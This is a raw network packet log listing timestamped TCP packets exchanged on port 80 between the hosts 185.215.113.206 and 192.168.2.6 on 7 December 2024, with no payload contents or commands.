Dec 7, 2024 10:51:51.207977057 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.208067894 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.208095074 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.208199024 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.208805084 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.208904028 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.208961010 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.209578037 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.209629059 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.209654093 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.209696054 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.210338116 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.210381985 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.210417986 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.210454941 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.211349010 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.211404085 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.211468935 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.211510897 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.212150097 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.212213039 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.212249041 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.212282896 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.213109016 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.213155985 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.213202953 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.213268995 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.213958979 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.214063883 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.214083910 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.214104891 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.214869976 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.214919090 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.214972019 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.215009928 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.215790033 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.215846062 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.215889931 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.215930939 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.216687918 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.216734886 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.216813087 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.216905117 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.217606068 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.217650890 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.217696905 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.217735052 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.218497038 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.218590975 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.218630075 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.218672037 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.219399929 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.219480038 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.219525099 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.219563961 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.220314026 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.220380068 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.220413923 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.220451117 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.221283913 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.221343040 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.221381903 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.221421957 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.222141981 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.222165108 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.222198009 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.222218990 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.223087072 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.223140955 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.223201036 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.223285913 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.223975897 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.224026918 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.224055052 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.224087954 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.224857092 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.224903107 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.224942923 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.224982977 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.225769997 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.225824118 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.225852966 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.225913048 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.226716995 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.226769924 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.226850986 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.226892948 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.227617979 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.227678061 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.227746964 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.227783918 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.228471994 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.228543997 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.228615999 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.228663921 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.229407072 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.229463100 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.229516029 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.229557991 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.230331898 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.230452061 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.230508089 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.231205940 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.231275082 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.231353045 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.231390953 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.232100964 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.232170105 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.232225895 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.232273102 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.232995987 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.233078003 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.233133078 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.233242989 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.233891010 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.233956099 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.234035969 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.234071970 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.234823942 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.234893084 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.234919071 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.234958887 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.235717058 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.235793114 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.235838890 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.235878944 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.236624956 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.236710072 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.236763954 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.237535000 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.237608910 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.349075079 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.349138975 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.349203110 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.349653006 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.349826097 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.349864006 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.349992037 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.350323915 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.350370884 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.350435019 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.350497961 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.351269960 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.351339102 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.351344109 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.351381063 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.352128029 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.352178097 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.352235079 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.352274895 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.353032112 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.353141069 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.353375912 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.353993893 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.354044914 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.354073048 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.354118109 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.354845047 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.354907990 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.355003119 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.355055094 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.355763912 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.355823040 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.355833054 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.355865955 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.356683016 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.356734037 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.356813908 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.357022047 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.357584000 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.357630968 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.357666969 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.357718945 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.358481884 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.358539104 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.358577967 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.358658075 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.359402895 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.359451056 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.359498978 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.359540939 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.360311985 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.360361099 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.360366106 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.360399008 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.361218929 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.361269951 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.361355066 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.361397982 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.362112045 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.362237930 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.362287045 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.363043070 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.363090992 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.363396883 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.363684893 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.397612095 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.397680044 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.397686958 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.397737026 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.398061991 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.398183107 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.398242950 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.399012089 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.399051905 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.399058104 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.399096012 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.399796009 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.399854898 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.399955034 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.400002003 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.400558949 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.400603056 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.400655985 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.400708914 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.401484013 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.401582956 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.401616096 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.401645899 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.402378082 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.402451992 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.402460098 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.402513981 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.403281927 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.403358936 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.403395891 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.403434992 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.404243946 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.404298067 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.404350042 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.404405117 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.405100107 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.405148983 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.405190945 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.405239105 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.405251980 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.406052113 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.406100988 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.406105995 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.406142950 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.406897068 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.406945944 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.407016039 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.407058001 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.407824039 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.407871008 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.407941103 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.408128023 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.408726931 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.408778906 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.408823013 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.408859968 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.409651041 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.409693003 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.409703016 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.409730911 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.410578966 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.410633087 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.410732985 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.410779953 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.411478996 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.411525965 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.411659002 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.411704063 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.412375927 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.412475109 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.412491083 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.412511110 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.413254023 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.413299084 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.413346052 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.413384914 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.414176941 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.414216995 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.414248943 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.415102005 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.415164948 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.415201902 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.415241003 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.416023970 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.416098118 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.416105986 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.416126966 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.416881084 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.416929007 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.417001963 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.417042017 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.417784929 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.417844057 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.417920113 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.417984962 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.418793917 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.418864965 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.418914080 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.418951035 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.419692993 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.419755936 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.419795036 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.419835091 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.420548916 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.420610905 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.420723915 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.420763969 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.421474934 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.421545029 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.421569109 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.421607018 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.422358036 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.422409058 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.422476053 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.422513962 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.423218012 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.423269033 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.423343897 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.423769951 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.424159050 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.424226046 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.424292088 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.424396038 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.425070047 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.425170898 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.425441980 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.425781012 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.425972939 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.426022053 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.426105976 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.426177979 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.426903963 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.426955938 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.426987886 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.427190065 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.427782059 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.427839041 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.427911997 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.428030968 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.428869963 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.428915977 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.428996086 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.429037094 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.429735899 CET	80	49808	185.215.113.206	192.168.2.6
